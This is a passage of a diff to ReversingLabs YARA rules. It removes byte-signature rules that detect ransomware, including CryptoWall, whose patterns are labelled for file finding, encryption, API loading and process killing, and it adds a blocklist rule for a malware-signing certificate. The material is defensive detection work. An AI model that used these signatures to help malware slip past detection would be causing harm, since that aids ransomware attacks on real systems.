-            55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? EB ?? 8B 45 ?? 48 98 48 8D 14 C5 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 8B 1C 02 48
-            8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 85
-            C0 0F 95 C0 84 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? B8
-            ?? ?? ?? ?? 48 83 C4 ?? 5B 5D C3
-        }
-		$kill_file_processes_p1 = {
-            55 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF C0
-            0F 11 45 ?? F3 0F 6F 4D ?? 0F 11 8D ?? ?? ?? ?? F3 0F 6F 55 ?? 0F 11 95 ?? ?? ?? ??
-            F3 0F 6F 5D ?? 0F 11 9D ?? ?? ?? ?? F3 0F 6F 65 ?? 0F 11 A5 ?? ?? ?? ?? 0F B7 45 ??
-            66 89 85 ?? ?? 00 00 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ??
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 41 B9
-            ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0
-            84 C0 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C
-            8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 41 B9 ??
-            ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
-            8B 85 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 C0 48 69 F0 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF
-            D0 49 89 F0 BA ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ??
-            48 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C 8B 8D ?? ??
-            ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24
-        }
-		$kill_file_processes_p2 = {
-            89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ??
-            85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ??
-            48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0
-            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48
-            98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0 8B 00 39 85 ?? ?? ?? ?? 75 ??
-            48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 48
-            8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0
-            8B 00 41 89 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ??
-            ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 85 ?? ?? ?? ??
-            41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ??
-            ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48
-            8D 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 48 63 C8 48 8D 45 ?? 48 8D 55
-            ?? 49 C7 C1 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ??
-            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $check_processes ) and ( all of ( $kill_file_processes_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "41:bd:49:bb:45:66:44:d8:18:3b:3d:ae:72:ec:8f:22" and 1468454400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Cryptowall : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_A8D40Da6708679C08Aebddea6D3F6B8A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CryptoWall ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "06d8b106-d69a-526a-8e16-c95d39eb2993"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "a4224bf1-1875-5b2c-b79d-998d3766d163"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.CryptoWall.yara#L3-L312"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "74baa04ee506732e0bb64a77cfd2d2216fcc978f13447ef07862e0116c093c14"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15646-L15664"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "27ec32791eaeccb8aa95d023c4fc8943f0435c32d8a17bde98d7d0b02ba17e59"
 		score = 75
-		quality = 88
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		quality = 90
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CryptoWall"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$v30_entrypoint = {
-            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 9A 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 7E C7 45 ?? ?? ?? ?? ??
-            8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2
-            E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2
-        }
-		$v20_entrypoint = {
-            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 A3 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 83 00 00 00 C7 45 ??
-            ?? ?? ?? ?? 8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 6A 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ??
-            ?? ?? FF D2 E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2
-        }
-		$v30_api_load = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 50 01 00 00 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 34 01 00 00 B9 ?? ?? ?? ?? 6B D1 ?? 8B 45 ?? 8B 4D ?? 03 4C 10 ?? 89 4D ?? 8B
-            55 ?? 8B 45 ?? 03 42 ?? 89 45 ?? 8B 4D ?? 8B 55 ?? 03 51 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? C7 45 ?? ?? ??
-            ?? ?? EB 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 3B 48 ?? 0F 83 DA 00 00 00 8B 55 ?? 8B 45 ?? 8B 4D ?? 03 0C 90
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 3B 45 ?? 0F 85 B7 00 00 00 BA ?? ?? ?? ?? 6B C2 ?? 8B 4D ?? 8B 54 01 ?? 8B 44 01 ?? 89 55 ??
-            89 45 ?? 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 14 81 3B 55 ?? 76 71 8B 45 ?? 8B 4D ?? 0F B7 14 41 8B 45 ?? 03 45 ??
-            8B 4D ?? 39 04 91 73 59 8B 55 ?? 8B 45 ?? 0F B7 0C 50 8B 55 ?? 8B 45 ?? 03 04 8A 89 45 ?? 74 3F 6A ?? 8B 4D ?? 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 55 ?? 8D 44 02 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8D 45 ?? 50 6A ?? 8D 4D ??
-            51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 40 ?? FF D0 EB 16 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 55 ?? 03 14 81 89 55 ?? EB
-            05 E9 0E FF FF FF 8B 45 ?? 8B E5 5D C3
-        }
-		$v30_dll_load = {
-            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 58 8B 45 ?? 8B 48 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45
-            ?? 8B 08 89 4D ?? 8B 55 ?? 3B 55 ?? 74 36 8B 45 ?? 89 45 ?? 8B 4D ?? 0F B7 51 ?? D1 EA 52 8B 45 ?? 8B 48 ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 3B 45 ?? 75 08 8B 55 ?? 8B 42 ?? EB 0C 8B 45 ?? 8B 08 89 4D ?? EB C2 33 C0 8B E5 5D C3
-        }
-		$v30_calculate_hash = {
-            55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5E 83 7D ?? ?? 74 58 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55
-            ?? 83 EA ?? 89 55 ?? 83 7D ?? ?? 74 3D 8B 45 ?? 66 8B 08 66 89 4D ?? 8B 75 ?? C1 EE ?? 0F B7 55 ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 0F B7 C0 33 45 ?? 25 ?? ?? ?? ?? 33 34 85 ?? ?? ?? ?? 89 75 ?? 8B 4D ?? 83 C1 ?? 89 4D ?? EB AE 8B 45 ?? 83 F0 ??
-            5E 8B E5 5D C3
-        }
-		$v30_1_find_file_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 47 02 00 00 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 32 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68
-            ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 B2 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 84 01 00
-            00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 A0 00 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 0F 85 80 00 00 00 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 69 C7 45 ?? ?? ??
-            ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 47 8B 45 ?? 50 8B 4D ?? 8B 11 52 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51
-        }
-		$v30_1_find_file_2 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
-            54 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 4D ?? 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 55 ?? 52 8B 45 ?? 50 E8 30 FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 4D ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 85 CE FE FF FF 8B 55 ?? 52 E8 ??
-            ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 74 2E 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 55 ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
-        }
-		$v30_2_find_file_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 ( 3B | 3D ) 02 00 00 E8 ?? ?? ??
-            ?? 89 45 ?? 83 7D ?? ?? 0F 84 ( 26 | 28 ) 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ??
-            ?? ?? ?? FF D1 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 83 7D ?? ?? 0F 84 ( A6 | A8 ) 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ??
-            83 7D ?? ?? 0F 84 ( 78 | 7A ) 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 94 00 00 00 C7 45 ?? ?? ?? ??
-            ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 78 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 C7
-            45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 43 8B 55 ?? 8B 02 50 8B
-        }
-		$v30_2_find_file_2 = {
-            4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
-            54 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 55 ?? 52 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 45 ?? 50 8B 4D ?? 51 E8 3C FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 55 ?? 52 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 85 DA FE FF FF 8B 45 ?? 50 E8 ??
-            ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 74 ( 2E | 30 ) 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 ( 0E | 10 ) 6A ?? [0-2] 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 89 55 ?? 8B 45 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
-        }
-		$v30_3_find_file_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 7C 02 00 00 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 67 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68
-            ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 E7 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 B9 01 00
-            00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 91 00 00 00 8D 55
-            ?? 52 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 7A 8B 4D ?? 8B 11 83 E2 ?? 75 70 C7 45 ?? ?? ?? ?? ?? 8D 45
-            ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 49 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 8B 45 ?? 8B
-        }
-		$v30_3_find_file_2 = {
-            08 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1C 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 88 00 00 00 8B 55 ?? 8B 02 83 E0 ?? 74 7E 8B 4D ?? 83 79 ?? ??
-            74 75 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 62 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B
-            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 40 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1D 8B 45
-            ?? 50 8B 4D ?? 51 E8 15 FE FF FF 83 C4 ?? 85 C0 74 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 85 AC FE FF FF 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ??
-            ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 2E 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 89
-            45 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
-        }
-		$v20_1_encrypt_file_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 99 05 00 00 8B 45 ??
-            83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 6E 05 00 00
-            8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
-            ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 F4 04 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B
-            4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50
-            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 E7 03 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ??
-            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 AF 03 00 00
-            8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 97 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6A 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 2C 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 D9 02 00 00
-        }
-		$v20_1_encrypt_file_2 = {
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ??
-            8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 81 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B
-            4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 41 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ??
-            0F 85 32 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F
-            84 0B 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 FF 01 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ??
